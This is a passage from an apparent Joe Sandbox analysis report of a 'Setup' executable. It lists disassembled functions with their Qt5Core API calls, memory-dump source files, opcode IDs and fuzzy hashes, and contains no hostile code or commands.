                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Byte$?begin@Array@@$String@@V0@@$ArrayDataPtr@@@$?detach_grow@?dispose@?end@Data@1@Data@1@@Init_thread_footer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1645541787-0
                                                                                                                                                              • Opcode ID: f5ff48d5ac1192bc4048d39eef1bbb392610cb57c32126d6d65bb1a776deb099
                                                                                                                                                              • Instruction ID: 19d0261e7c3b515ad964b2983f16ca15e53786b56b1ad99c786276ee7aa819e0
                                                                                                                                                              • Opcode Fuzzy Hash: f5ff48d5ac1192bc4048d39eef1bbb392610cb57c32126d6d65bb1a776deb099
                                                                                                                                                              • Instruction Fuzzy Hash: 1C212CA1A0EA8285EB82DB35E8403A53361FF44794F908232DD6E472A5FF3DE945CF14
                                                                                                                                                              Function 00007FFBA197DA80 Relevance: 6.0, APIs: 4, Instructions: 47timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ElapsedTimer@@$?elapsed@?restart@Valid@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1089445756-0
                                                                                                                                                              • Opcode ID: 67d5462ce0ff3e378cd5ea5da7e28c2e43514b92716f2c947bf9311eb890e950
                                                                                                                                                              • Instruction ID: bb9d16b95fba2043f40cca8d30d3b57dcfbc2c918c4a10a796b5cd7800b8dca6
                                                                                                                                                              • Opcode Fuzzy Hash: 67d5462ce0ff3e378cd5ea5da7e28c2e43514b92716f2c947bf9311eb890e950
                                                                                                                                                              • Instruction Fuzzy Hash: D8116DB2A0AA8181E791CF25E4403E96760FB44B98F584031EE8E476A5DF3DD486CB00
                                                                                                                                                              Function 00007FFBA19E2630 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?lock@QMutex@@QEAAXXZ.QT5CORE(00000000,?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E264F
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E265E
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E266B
                                                                                                                                                              • ?unlock@QMutex@@QEAAXXZ.QT5CORE(?,00000000,00007FFBA19DF7EE,?,?,00000000,00007FFBA1973409,?,?,00000000,00007FFBA19730F0), ref: 00007FFBA19E26B2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@ListMutex@@$?begin@?end@?lock@?unlock@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3979743312-0
                                                                                                                                                              • Opcode ID: 66773a8d15c61e9d42ea459106c4e4bbe87b49aa1589364d060b88d8efa0fa82
                                                                                                                                                              • Instruction ID: 79d92cdfd59d4b01f239b2bacdbb0e6263f51f4a29eb35457c06480b048c5753
                                                                                                                                                              • Opcode Fuzzy Hash: 66773a8d15c61e9d42ea459106c4e4bbe87b49aa1589364d060b88d8efa0fa82
                                                                                                                                                              • Instruction Fuzzy Hash: CA113066709B15CADB51EF26E4440E96B64FB88F94B498032EE4E47714EE38C586CB40
                                                                                                                                                              Function 00007FFBA1A20BF0 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C46
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C50
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C6C
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC,?,?,000000E8,00007FFBA198468C,?,?,00000000), ref: 00007FFBA1A20C76
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A364E8
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A3650D
                                                                                                                                                                • Part of subcall function 00007FFBA1A364D0: ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,00007FFBA1A20C42,?,?,?,00007FFBA1A1EC65), ref: 00007FFBA1A36524
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteDateLogger@@MessageTime@@$?warning@Category@@Enabled@H00@LoggingWarning
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1974625209-0
                                                                                                                                                              • Opcode ID: 6172baba91f68d4e2886951456046191041422414c43e821af7e2d4baf580669
                                                                                                                                                              • Instruction ID: e784db2176df05f52756edd8fd78cd546e1e654180e237560ad2510f723b492d
                                                                                                                                                              • Opcode Fuzzy Hash: 6172baba91f68d4e2886951456046191041422414c43e821af7e2d4baf580669
                                                                                                                                                              • Instruction Fuzzy Hash: 7A11C4A2B1AA0292EBC6DB31D64417C6361FF50B50F040533DE2E079A5FF2CE8A5CB40
                                                                                                                                                              Function 00007FFBA1A05C10 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QIODevicePrivate@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA1A05C1D
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05C4F
                                                                                                                                                                • Part of subcall function 00007FFBA19EC610: ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA19EC62D
                                                                                                                                                                • Part of subcall function 00007FFBA19EC610: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,00000000,00007FFBA1A281B7,?,?,?,00007FFBA1A410AE,?,?,00000000,00007FFBA1A28162), ref: 00007FFBA19EC637
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05C9B
                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE ref: 00007FFBA1A05CD2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$BasicDevicePrivate@@Timer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3443080667-0
                                                                                                                                                              • Opcode ID: abf80747e6f4c6d06328e2431a0c9208d3230ed4bfe03fccd7255f7f31c7962a
                                                                                                                                                              • Instruction ID: 40eb92e4adc00d6d816f14fb3bc61fb5ab671dbc95b01f2857b23edaf5858cdd
                                                                                                                                                              • Opcode Fuzzy Hash: abf80747e6f4c6d06328e2431a0c9208d3230ed4bfe03fccd7255f7f31c7962a
                                                                                                                                                              • Instruction Fuzzy Hash: 2921D672505B8290DB819F31E8943E93364FB54B78F484336DEBD0A2E9EF389149CB60
                                                                                                                                                              Function 00007FFBA19F54D0 Relevance: 6.0, APIs: 4, Instructions: 45timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F54F0
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F54FD
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F550C
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,00000000,00007FFBA19F6D91,?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F551B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteV0@@$BasicTimer@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4220465339-0
                                                                                                                                                              • Opcode ID: 52ccd93735a70927a876bfd99812aed9ea62d7fd37b1b693cbb51cfff0641599
                                                                                                                                                              • Instruction ID: 2c3fd52572eb88d0b29847361c9c488af483c5684f8123afed437a87bf73b933
                                                                                                                                                              • Opcode Fuzzy Hash: 52ccd93735a70927a876bfd99812aed9ea62d7fd37b1b693cbb51cfff0641599
                                                                                                                                                              • Instruction Fuzzy Hash: 5B11FE72609F41C9D741CF3AE88006977A1FB58B98B145136EE5D43B28EF38D451CB40
                                                                                                                                                              Function 00007FFBA1973010 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1973056
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA197305F
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA197306B
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1973077
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2291827984-0
                                                                                                                                                              • Opcode ID: 0d67f581545079490c4d3e02cdbf27da84d27e7be127abc58a95db8d489a998d
                                                                                                                                                              • Instruction ID: 7f548c581033bea584f0931bcf079aa3d839284e02cdd4e41f6f413e17cdf13f
                                                                                                                                                              • Opcode Fuzzy Hash: 0d67f581545079490c4d3e02cdbf27da84d27e7be127abc58a95db8d489a998d
                                                                                                                                                              • Instruction Fuzzy Hash: 0C019272B1A74182EF959B2AF8440687355AF88FE4B088031EE5E47790DF3CD4828B40
                                                                                                                                                              Function 00007FFBA1984CD0 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984CE9
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE ref: 00007FFBA1984CF7
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984D03
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE ref: 00007FFBA1984D0F
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EB7
                                                                                                                                                                • Part of subcall function 00007FFBA1977E70: ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,00007FFBA197308E,?,?,00000000,00007FFBA1984BB6,?,?,?,00007FFBA198464A,?,?,00000000,00007FFBA198413E), ref: 00007FFBA1977EC5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@Array@@ByteV0@@$?detach@?end@Data@1@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 414843946-0
                                                                                                                                                              • Opcode ID: dce9efa669743ab5ab2557d69c64e5bc6c05cf2cfb332953ed0526b3be37b0c0
                                                                                                                                                              • Instruction ID: b2f684b23677c8a9e54deb4494675748dc06a47edf72c7150dc940e6bc410cb9
                                                                                                                                                              • Opcode Fuzzy Hash: dce9efa669743ab5ab2557d69c64e5bc6c05cf2cfb332953ed0526b3be37b0c0
                                                                                                                                                              • Instruction Fuzzy Hash: A401B571B0A74146DB959F36F8480697351AF89FE0B488130EEAD47795DE2CE442CF40
                                                                                                                                                              Function 00007FFBA19E0860 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ?lock@Locker@@MutexMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2791775482-0
                                                                                                                                                              • Opcode ID: af46e50bca62f366960a1924babcbedd051b3f1a198ff8e8abf6e7e14ef314ed
                                                                                                                                                              • Instruction ID: 0a153915742dc985ce1860203d8b5f4e91a6d00fabcc7614fd147510726d46a7
                                                                                                                                                              • Opcode Fuzzy Hash: af46e50bca62f366960a1924babcbedd051b3f1a198ff8e8abf6e7e14ef314ed
                                                                                                                                                              • Instruction Fuzzy Hash: 54017C3671AA8281EB85CB65E0D002977A0FF84B94B894131EF9E47764EF2CD595CB40
                                                                                                                                                              Function 00007FFBA1A28280 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282BA
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282C4
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282F3
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,00007FFBA1A2836E,?,?,00000018,00007FFBA1A2A275,?,?,?,00007FFBA1A2C553,?,?,00000000), ref: 00007FFBA1A282FC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$?freeData$Array@@ByteData@NodeTree@U1@@Variant@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 537957619-0
                                                                                                                                                              • Opcode ID: 6307a5bf72a4a2e8f89dcfb255787114d70f5f2b218ad3ba116e681ed5fdb46d
                                                                                                                                                              • Instruction ID: b650e37bc3158504d50671cf5fd6a221ccbf9ebc0184416743f6a69577e04c46
                                                                                                                                                              • Opcode Fuzzy Hash: 6307a5bf72a4a2e8f89dcfb255787114d70f5f2b218ad3ba116e681ed5fdb46d
                                                                                                                                                              • Instruction Fuzzy Hash: 9F0130A5A0AA5182EB959F35D84017823A0FF89FA4F044632DE2D436A4EF3CE455CF00
                                                                                                                                                              Function 00007FFBA1A1EC90 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ECCA
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ECD4
                                                                                                                                                              • ?freeTree@QMapDataBase@@QEAAXPEAUQMapNodeBase@@H@Z.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ED03
                                                                                                                                                              • ?freeData@QMapDataBase@@SAXPEAU1@@Z.QT5CORE(?,?,?,?,00007FFBA1A20C5F,?,?,?,00007FFBA1A1EC65,?,?,?,?,00007FFBA1A221CC), ref: 00007FFBA1A1ED0C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Base@@$?freeData$Array@@ByteData@NodeString@@Tree@U1@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1897305905-0
                                                                                                                                                              • Opcode ID: 84bc91f394044a75b9ef494a32f9e972e7d21363fd29015c6cb55e2c16442f4b
                                                                                                                                                              • Instruction ID: 4c9eff2648b45eb390fa084053f2cda35904a08214f3f68fbbe22f4848b80529
                                                                                                                                                              • Opcode Fuzzy Hash: 84bc91f394044a75b9ef494a32f9e972e7d21363fd29015c6cb55e2c16442f4b
                                                                                                                                                              • Instruction Fuzzy Hash: FE0130B560AA4582EB9A9F35D9401793361FF44BA0B584533DE2D47694EF2CE4548B40
                                                                                                                                                              Function 00007FFBA19850F0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
